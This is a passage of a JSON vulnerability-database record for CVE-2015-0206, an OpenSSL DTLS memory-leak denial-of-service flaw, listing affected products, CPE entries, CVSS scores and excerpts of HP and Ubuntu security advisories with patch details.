"trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "app for vmware", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.10" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "cloud", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "communications core session manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.2.5" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "71940" }, { "db": "CNNVD", "id": "CNNVD-201501-173" }, { "db": "NVD", "id": "CVE-2015-0206" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-0206" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" } ], "trust": 0.5 }, "cve": "CVE-2015-0206", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2015-0206", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-0206", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201501-173", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-0206", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0206" }, { "db": "CNNVD", "id": "CNNVD-201501-173" }, { "db": "NVD", "id": "CVE-2015-0206" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause the memory exhaustion, resulting in denial-of-service conditions. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. ============================================================================\nUbuntu Security Notice USN-2459-1\nJanuary 12, 2015\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. (CVE-2014-3571)\n\nKarthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain\nhandshakes. A remote attacker could possibly use this issue to downgrade to\nECDH, removing forward secrecy from the ciphersuite. (CVE-2014-3572)\n\nAntti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that\nOpenSSL incorrectly handled certain certificate fingerprints. A remote attacker could possibly use this issue to downgrade\nthe security of the session to EXPORT_RSA. (CVE-2015-0204)\n\nKarthikeyan Bhargavan discovered that OpenSSL incorrectly handled client\nauthentication. \nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0205)\n\nChris Mueller discovered that OpenSSL incorrect handled memory when\nprocessing DTLS records. This issue\nonly affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10. \n(CVE-2015-0206)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n libssl1.0.0 1.0.1f-1ubuntu9.1\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.8\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.21\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.23\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04774019\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04774019\nVersion: 1\n\nHPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Matrix\nOperating Environment. The vulnerabilities could be exploited remotely\nresulting in unauthorized modification, unauthorized access, or unauthorized\ndisclosure of information. \n\nReferences:\n\nCVE-2010-5107\nCVE-2013-0248\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-1692\nCVE-2014-3523\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8142\nCVE-2014-8275\nCVE-2014-9427\nCVE-2014-9652\nCVE-2014-9653\nCVE-2014-9705\nCVE-2015-0204\nCVE-2015-0205\nCVE-2015-0206\nCVE-2015-0207\nCVE-2015-0208\nCVE-2015-0209\nCVE-2015-0231\nCVE-2015-0232\nCVE-2015-0273\nCVE-2015-0285\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0290\nCVE-2015-0291\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-1787\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2015-2134\nCVE-2015-2139\nCVE-2015-2140\nCVE-2015-2301\nCVE-2015-2331\nCVE-2015-2348\nCVE-2015-2787\nCVE-2015-3113\nCVE-2015-5122\nCVE-2015-5123\nCVE-2015-5402\nCVE-2015-5403\nCVE-2015-5404\nCVE-2015-5405\nCVE-2015-5427\nCVE-2015-5428\nCVE-2015-5429\nCVE-2015-5430\nCVE-2015-5431\nCVE-2015-5432\nCVE-2015-5433\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Matrix Operating Environment impacted software components and versions:\n\nHP Systems Insight Manager (SIM) prior to version 7.5.0\nHP System Management Homepage (SMH) prior to version 7.5.0\nHP Version Control Agent (VCA) prior to version 7.5.0\nHP Version Control Repository Manager (VCRM) prior to version 7.5.0\nHP Insight Orchestration prior to version 7.5.0\nHP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented 